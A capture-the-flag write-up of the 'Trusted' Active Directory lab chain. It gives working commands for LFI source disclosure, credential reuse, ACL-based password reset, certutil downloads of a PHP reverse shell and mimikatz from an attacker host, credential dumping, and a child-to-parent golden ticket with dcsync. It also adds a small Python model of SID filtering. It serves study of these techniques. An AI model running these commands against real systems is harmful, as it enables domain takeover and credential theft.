Chain - Trusted

Writeup Author: bobbuilder


Overview

Category: Chain

Difficulty: Easy (Windows)

Machine Author: r0BIT

Domain: trusted.vl

Machines:

  • trusted.vl (Windows Domain Controller)
  • lab.trusted.vl (XAMPP test environment)

Objective: Domain Admin compromise in trusted.vl through:

  • Exposed XAMPP web server with LFI and credential disclosure
  • MySQL credential reuse for initial AD user access
  • ACL abuse to reset another user's password
  • Privilege escalation via SeMachineAccountPrivilege
  • Remote code execution via PHP shell
  • Dumping local admin credentials using mimikatz
  • Cross-trust attack using a Golden Ticket
  • Full compromise of parent domain trusted.vl

Web Enumeration (10.10.226.246)

XAMPP Apache

  • Version: Apache/2.4.53, PHP/8.1.6
  • phpinfo exposed: /dashboard/phpinfo.php
  • allow_url_fopen enabled

Fuzzing

wfuzz -c --hh 306 -w raft-medium-directories.txt http://labdc.lab.trusted.vl/FUZZ
Found: /dev

LFI + Source Disclosure:

/dev/index.html?view=php://filter/convert.base64-encode/resource=db.php
Credentials found:
- User: root
- Pass: [REDACTED]

MySQL Access

mysql -h labdc.lab.trusted.vl -u root -p
use news;
select * from users;

Cracked rsmith password:

[REDACTED]

SMB + BloodHound

nxc smb 10.10.136.38 -u rsmith -p '[REDACTED]' --shares
bloodhound-python -u rsmith -p [REDACTED] -d lab.trusted.vl -dc labdc.lab.trusted.vl -ns 10.10.136.38
  • rsmith can reset ewalters's password

PrivEsc: ewalters Access

Set-DomainUserPassword -Identity EWALTERS -AccountPassword [REDACTED]

Login via WinRM:

evil-winrm -i 10.10.136.38 -u ewalters -p [REDACTED]
  • Has SeMachineAccountPrivilege

Readme.txt Clue

C:/AVTest/readme.txt
The note says Christine has been running AV tools on this host, suggesting it is a test environment rather than a hardened production box.

XAMPP RCE via PHP Reverse Shell

certutil.exe -urlcache -split -f http://attacker/winphprevshell.php rev.php
Visiting https://labdc.lab.trusted.vl/rev.php triggers the reverse shell.

The Apache service runs as SYSTEM, so the callback is a SYSTEM shell.

Dump Credentials (Local Admin Access)

certutil.exe -urlcache -split -f http://attacker/mimikatz.exe mimikatz.exe
mimikatz "privilege::debug" "lsadump::lsa /patch"

Dumped Administrator NTLM hash: [REDACTED]

Login as Administrator

evil-winrm -i 10.10.136.38 -u Administrator -H [REDACTED]

Dump Other Credentials

secretsdump.py lab.trusted.vl/'LABDC$'@10.10.136.38 -hashes :[REDACTED]

Trust Enumeration

Get-ADTrust -Filter *
Bidirectional trust: lab.trusted.vl <-> trusted.vl (child <-> parent, same forest)

Cross-Trust Attack (Golden Ticket)

krbtgt NTLM (child): [REDACTED]
Domain SID (parent): S-1-5-21-3576695518-347000760-3731839591

Create Golden Ticket:

mimikatz "kerberos::golden /user:Administrator /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /krbtgt:[REDACTED] /sids:S-1-5-21-3576695518-347000760-3731839591-519 /ptt"

Dump Trusted DC creds:

lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /all

Administrator NTLM (trusted): [REDACTED]
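Why the /sids value above works: inside a forest, the parent domain does not SID-filter the SIDHistory (ExtraSids) that a child DC's ticket carries, so a forged Enterprise Admins SID (RID 519 in the forest root) is honoured. The following is an added example, not part of the original writeup, that models the core rule SID filtering ("quarantine") applies on external and forest trusts: a SID is kept only if its domain prefix is the trusted domain's own SID. The real Windows algorithm has further rules (always-filtered well-known SIDs, forest-wide trust handling) that this simplified model omits.

```python
"""Simplified model of SID filtering on a Kerberos trust (added example).

Models only the core rule: a SID arriving from the trusted domain is kept
if its domain prefix equals the trusted domain's SID, otherwise dropped.
"""
import re

# Matches a domain SID (S-1-5-21-a-b-c) with an optional trailing RID.
SID_RE = re.compile(r"^S-1-5-21(?:-\d+){3}(?:-\d+)?$")

# Domain SIDs taken from the writeup above.
CHILD_SID = "S-1-5-21-2241985869-2159962460-1278545866"   # lab.trusted.vl
PARENT_SID = "S-1-5-21-3576695518-347000760-3731839591"   # trusted.vl


def domain_part(sid):
    """Return the domain SID of a SID, stripping a trailing RID if present."""
    if not SID_RE.match(sid):
        raise ValueError(f"not a domain SID: {sid}")
    parts = sid.split("-")
    # 7 components: already a bare domain SID; 8: domain SID plus RID.
    return "-".join(parts[:7]) if len(parts) == 8 else sid


def filter_extra_sids(trusted_domain_sid, extra_sids):
    """Split a ticket's ExtraSids into (kept, dropped) under SID filtering.

    trusted_domain_sid is the SID of the domain the ticket arrives from
    (here the child, lab.trusted.vl). Anything claiming membership in
    another domain, such as the parent's Enterprise Admins, is dropped.
    """
    kept, dropped = [], []
    for sid in extra_sids:
        target = kept if domain_part(sid) == trusted_domain_sid else dropped
        target.append(sid)
    return kept, dropped


def demo():
    # Constructed ExtraSids list: the writeup's forged parent-519 SID plus a
    # legitimate group SID (RID 512, Domain Admins) from the child domain.
    forged_extra = [PARENT_SID + "-519", CHILD_SID + "-512"]
    return filter_extra_sids(CHILD_SID, forged_extra)


if __name__ == "__main__":
    kept, dropped = demo()
    print("kept:", kept)
    print("dropped:", dropped)
```

With filtering in place the parent-519 SID is dropped and the forged ticket grants only what the child domain can legitimately assert; the writeup succeeds precisely because intra-forest trusts do not apply this rule.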

Full DA Access to Trusted Domain

evil-winrm -i 10.10.226.245 -u Administrator -H [REDACTED]

(Optional) Automated Golden Ticket

impacket-raiseChild lab.trusted.vl/cpowers -hashes :[REDACTED]

Final Step - Decrypt Flag

The flag is EFS-encrypted, which the file attribute check confirms:

[System.IO.File]::GetAttributes("C:\Users\Administrator\Desktop\root.txt").ToString().Contains("Encrypted")

EFS needs the account's password-derived key, which a pass-the-hash session does not provide, so set a new Administrator password and read the file through a password logon:

runas.exe Administrator "[REDACTED]" "cmd.exe /c type C:\Users\Administrator\Desktop\root.txt"